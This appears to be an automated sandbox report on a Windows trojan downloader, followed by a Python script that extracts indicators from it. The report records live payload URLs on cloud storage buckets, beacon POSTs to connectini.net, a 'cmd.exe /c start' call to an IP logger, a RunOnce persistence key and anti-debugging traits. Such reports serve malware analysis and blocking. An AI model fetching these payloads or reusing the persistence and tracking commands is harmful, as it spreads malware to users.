Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Dec. 12, 2022, 9:39 a.m. | Dec. 12, 2022, 9:43 a.m. |
Process Tree

Process | PID | Command line |
---|---|---|
CR3.tmp | 2112 | "C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp" /SL5="$30028,140518,56832,C:\Users\test22\AppData\Local\Temp\CR3.exe" |
poweroff.tmp | 2956 | "C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT |
Power Off.exe | 2076 | "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu |
Cixydusuno.exe | 3000 | "C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe" |
iexplore.exe | 2480 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
iexplore.exe | 2696 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409 |
Tenukaeqaefe.exe | 3036 | "C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe" |
iexplore.exe | 2792 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409 |
explorer.exe | 1236 | C:\Windows\Explorer.EXE |

The parent/child indentation of the original tree did not survive extraction, so the processes are listed in report order. Two relations can still be read from the command lines: the `*.tmp /SL5=...` entries are Inno Setup child processes whose last /SL5 field names the installer that spawned them (CR3.exe and the dropped poweroff.exe), and the SCODEF:<pid> value on an iexplore.exe tab process is the PID of its Internet Explorer frame process, so PID 2696 is a child of 2480. The frame process 2368 referenced by PID 2792 is not itself listed above.
IP Address | Status | Action |
---|---|---|
148.251.234.93 | Active | Moloch |
151.115.10.1 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.161.36 | Active | Moloch |
172.217.31.14 | Active | Moloch |
173.233.137.44 | Active | Moloch |
23.43.165.105 | Active | Moloch |
37.230.138.123 | Active | Moloch |
37.230.138.66 | Active | Moloch |
52.219.171.106 | Active | Moloch |
95.214.24.96 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint (SHA-1) |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 -> 52.219.171.106:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-central-1.amazonaws.com | bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb |
TLS 1.2 192.168.56.103:49169 -> 151.115.10.1:443 | C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLS 1.2 192.168.56.103:49170 -> 151.115.10.1:443 | C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLSv1 192.168.56.103:49166 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49226 -> 173.233.137.44:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLSv1 192.168.56.103:49196 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49220 -> 37.230.138.123:443 | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49225 -> 173.233.137.44:443 | C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |

The three connections to 37.230.138.123 present a self-signed Plesk certificate (issuer equals subject), the default certificate of an unconfigured Plesk host rather than one issued for a named domain.
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | CODE |
section | DATA |
section | BSS |
suspicious_features | suspicious_request |
---|---|
POST method with no referer header, POST method with no useragent header | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
GET method with no useragent header | GET http://www.google.com/ |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/SuperNitouDisc.php |
GET method with no useragent header | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
GET method with no useragent header | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe |
GET method with no useragent header | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe |
GET method with no useragent header | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe |
GET method with no useragent header | GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
GET method with no useragent header | GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/Conumer4Publisher.php |
GET method with no useragent header | GET https://connectini.net/Series/publisher/1/KR.json |
POST method with no referer header, POST method with no useragent header | POST https://connectini.net/Series/Conumer2kenpachi.php |
GET method with no useragent header | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
GET method with no useragent header | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
GET method with no useragent header | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW |
GET method with no useragent header | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww |
GET method with no useragent header | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW |
request | HEAD http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe |
request | GET http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | GET http://www.google.com/ |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | GET https://connectini.net/Series/publisher/1/KR.json |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
description | Cixydusuno.exe tried to sleep 129 seconds, actually delayed analysis time by 129 seconds |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk |
file | C:\Users\Public\Desktop\powerOff.lnk |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll |
file | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Program Files (x86)\Google\SHesypalori.exe |
file | C:\Users\test22\AppData\Local\Temp\is-HQVUQ.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk |
file | C:\Users\Public\Desktop\powerOff.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1bDHA4.jpg |
file | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe |
file | C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp |
description | rule |
---|---|
(no description) | DebuggerCheck__GlobalFlags |
(no description) | DebuggerCheck__QueryInfo |
(no description) | DebuggerHiding__Thread |
(no description) | DebuggerHiding__Active |
(no description) | ThreadControl__Context |
(no description) | SEH__vectored |
Checks if being debugged | anti_dbg |
Bypass DEP | disable_dep |
(no description) | DebuggerCheck__GlobalFlags |
(no description) | DebuggerCheck__QueryInfo |
(no description) | DebuggerHiding__Thread |
(no description) | DebuggerHiding__Active |
(no description) | ThreadControl__Context |
(no description) | SEH__vectored |
Checks if being debugged | anti_dbg |
Bypass DEP | disable_dep |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
cmdline | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe /VERYSILENT |
cmdline | C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome |
cmdline | "C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT |
cmdline | "C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT |
host | 95.214.24.96 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover | reg_value | "C:\Program Files (x86)\Google\SHesypalori.exe" |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
process | CR3.tmp | useragent | InnoDownloadPlugin/1.5 |
process | iexplore.exe | useragent | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) |
cmdline | "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu |
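The signature rows above are flat `field | value` records, which is inconvenient when you want the indicators out of them. The script below is an added example, not part of the original report or of the sandbox that produced it: it parses a handful of rows copied from this report (embedded as a constructed sample), lists the contacted hosts and the executable download URLs, recovers the original installer path from an Inno Setup `/SL5=` argument (its last comma-separated field; the numeric fields are size and offset values), collects Run/RunOnce persistence entries, and picks out URLs opened through `cmd.exe /c start`. The function names and the sample are my own.

```python
"""Pull indicators out of flattened sandbox report rows ('field | value | ...')."""
import re
from urllib.parse import urlparse

# Constructed sample: a few rows copied verbatim from the report above.
SAMPLE_ROWS = r"""
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
suspicious_features | GET method with no useragent header | suspicious_request | GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe
request | HEAD http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c
cmdline | "C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp" /SL5="$30028,140518,56832,C:\Users\test22\AppData\Local\Temp\CR3.exe"
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover | reg_value | "C:\Program Files (x86)\Google\SHesypalori.exe"
cmdline | "C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1bDHA4.jpg
"""

REQUEST_RE = re.compile(r"\b(GET|POST|HEAD)\s+(https?://\S+)")
# Inno Setup's loader passes /SL5="$<hex window handle>,<size>,<offset>,<original setup exe>"
SL5_RE = re.compile(r'/SL5="\$[0-9A-Fa-f]+,(\d+),(\d+),([^"]+)"')
PAYLOAD_EXT = (".exe", ".dll", ".msi")
RUN_KEY_MARK = r"\CurrentVersion\Run"   # substring of both Run and RunOnce keys


def parse_rows(text):
    """Split each non-empty line on the ' | ' cell separator, dropping trailing empty cells."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.split(" | ")]
        while cells and cells[-1] == "":
            cells.pop()
        rows.append(cells)
    return rows


def extract_requests(rows):
    """(method, url) for the first 'METHOD http(s)://...' found in each row."""
    found = []
    for cells in rows:
        for cell in cells:
            m = REQUEST_RE.search(cell)
            if m:
                found.append((m.group(1), m.group(2)))
                break
    return found


def contacted_hosts(requests):
    """Sorted, deduplicated hostnames from the request URLs."""
    return sorted({urlparse(url).hostname for _, url in requests})


def payload_urls(requests):
    """Download URLs whose path ends in an executable extension, deduplicated in order."""
    out = []
    for _, url in requests:
        if urlparse(url).path.lower().endswith(PAYLOAD_EXT) and url not in out:
            out.append(url)
    return out


def inno_setup_origin(cmdline):
    """Path of the installer that spawned an Inno Setup '*.tmp /SL5=...' child, or None."""
    m = SL5_RE.search(cmdline)
    return m.group(3) if m else None


def persistence_entries(rows):
    """(key, command) for reg_key rows under the CurrentVersion Run or RunOnce keys."""
    out = []
    for cells in rows:
        if cells and cells[0] == "reg_key" and len(cells) >= 4 and RUN_KEY_MARK in cells[1]:
            out.append((cells[1], cells[3].strip('"')))
    return out


def browser_launches(rows):
    """URLs opened via 'cmd.exe /c start <url>' (here used to hit an IP logger)."""
    urls = []
    for cells in rows:
        if cells and cells[0] == "cmdline":
            m = re.search(r"/c\s+start\s+(https?://\S+)", cells[1])
            if m:
                urls.append(m.group(1))
    return urls


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    reqs = extract_requests(rows)
    print("hosts:", contacted_hosts(reqs))
    print("payloads:", payload_urls(reqs))
    for cells in rows:
        if cells[0] == "cmdline" and (origin := inno_setup_origin(cells[1])):
            print("inno setup origin:", origin)
    print("persistence:", persistence_entries(rows))
    print("browser launches:", browser_launches(rows))
```

Feeding the complete row set from this report through the same functions gives the full host list for blocking and the set of second-stage binaries to pull from the sandbox's dropped files; the `/SL5` parse is what lets you tie the anonymous `is-*.tmp` children back to CR3.exe and to the poweroff.exe dropped under Program Files\Internet Explorer.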
Antivirus | Result |
---|---|
Bkav | W32.AIDetect.malware2 |
Lionic | Riskware.Win32.Babar.1!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 99) |
McAfee | RDN/Generic.dx |
Malwarebytes | Trojan.Dropper |
VIPRE | Gen:Variant.Babar.125028 |
Sangfor | Downloader.Msil.Agent.Vmvb |
Alibaba | TrojanDownloader:MSIL/Generic.187546cc |
Cybereason | malicious.278bea |
Cyren | W32/ABRisk.BYET-4883 |
Symantec | Trojan.Gen.MBT |
APEX | Malicious |
Kaspersky | Trojan-Downloader.MSIL.Csdi.fg |
BitDefender | Gen:Variant.Babar.125028 |
MicroWorld-eScan | Gen:Variant.Babar.125028 |
Avast | FileRepMalware [Misc] |
Ad-Aware | Gen:Variant.Babar.125028 |
Emsisoft | Gen:Variant.Babar.125028 (B) |
TrendMicro | Trojan.Win32.PRIVATELOADER.YXCLKZ |
McAfee-GW-Edition | BehavesLike.Win32.AdwareFileTour.fc |
FireEye | Gen:Variant.Babar.125028 |
Sophos | Mal/Generic-S (PUA) |
GData | Gen:Variant.Babar.125028 |
Avira | HEUR/AGEN.1233171 |
Kingsoft | Win32.TrojDownloader.MSIL.fg.(kcloud) |
Gridinsoft | Malware.Win32.Phonzy.cl |
Arcabit | Trojan.Babar.D1E864 |
ZoneAlarm | Trojan-Downloader.MSIL.Csdi.fg |
Microsoft | Trojan:Script/Phonzy.A!ml |
Detected | |
AhnLab-V3 | Malware/Win.Generic.C5190104 |
ALYac | Gen:Variant.Babar.125028 |
MAX | malware (ai score=83) |
Cylance | Unsafe |
TrendMicro-HouseCall | Trojan.Win32.PRIVATELOADER.YXCLKZ |
Tencent | Msil.Trojan-Downloader.Csdi.Dwnw |
Fortinet | W32/PossibleThreat |
AVG | FileRepMalware [Misc] |